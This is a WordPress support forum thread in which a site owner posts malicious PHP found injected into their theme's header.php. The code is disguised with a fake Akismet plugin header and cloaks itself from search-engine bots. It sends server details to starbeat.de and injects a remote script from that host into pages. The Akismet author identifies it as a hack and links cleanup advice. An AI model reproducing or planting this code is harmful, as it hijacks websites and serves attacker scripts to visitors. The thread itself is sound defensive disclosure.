Akismet in header, Starbeat.de, iframe Internet Explorer IE

  • Resolved nickth

    (@nickth)


    9 years, 1 month ago

    I found an iframe code in my site, noticed status bar was trying to connect to starbeat.de, and then downloaded all the files from the server and searched for starbeat.de and found this code which I’ve never seen in the header.php file before! Akismet is a plugin with it’s own files not in the theme!

    <body <?php body_class(); ?>>
<?php
#a08bd5#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/

if( empty( $su ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }

        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
// Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
// Bad protocol
                    return false;
                }
                if( !$socket ) {
// Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
// Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
// Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }

        $su['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $su['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $su['PHP_SELF'] = $_SERVER['PHP_SELF'];
        $su['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $su['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $su['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $su['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
        $su['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];

        $su = __url_get_contents(
            "http://starbeat.de/f6f23dqg.php" . "?fid=2281358&info=" . http_build_query( $su ) . "&no=1&allow=1",
            2
        );

        $su = trim( $su );
        if( $su !== 'false' ) {
            echo "<script type=\"text/javascript\" src=\"http://starbeat.de/f6f23dqg.php?id=8234289\"></script>";
        }
    }
}
#/a08bd5#
?>

    https://wordpress.org/plugins/akismet/

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Christopher Finke

    (@cfinke)

    9 years, 1 month ago

    That’s not actually Akismet; it’s a hack attempting to masquerade as Akismet in the hopes that fewer people will remove it.

    You should take a look at the “My site was hacked” FAQ and follow the directions there: http://codex.wordpress.org/FAQ_My_site_was_hacked Certainly remove all of the code between the #a08bd5# lines.

    Thread Starter nickth

    (@nickth)

    9 years, 1 month ago

    Yeah I removed it. I also posted it here for the benefit of others who may experience this.

    Guido

    (@guido07111975)

    9 years ago

    Have the same issue, with multiple sites 🙁

    I also first thought Akismet has something to do with this..

    Guido

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Akismet in header, Starbeat.de, iframe Internet Explorer IE’ is closed to new replies.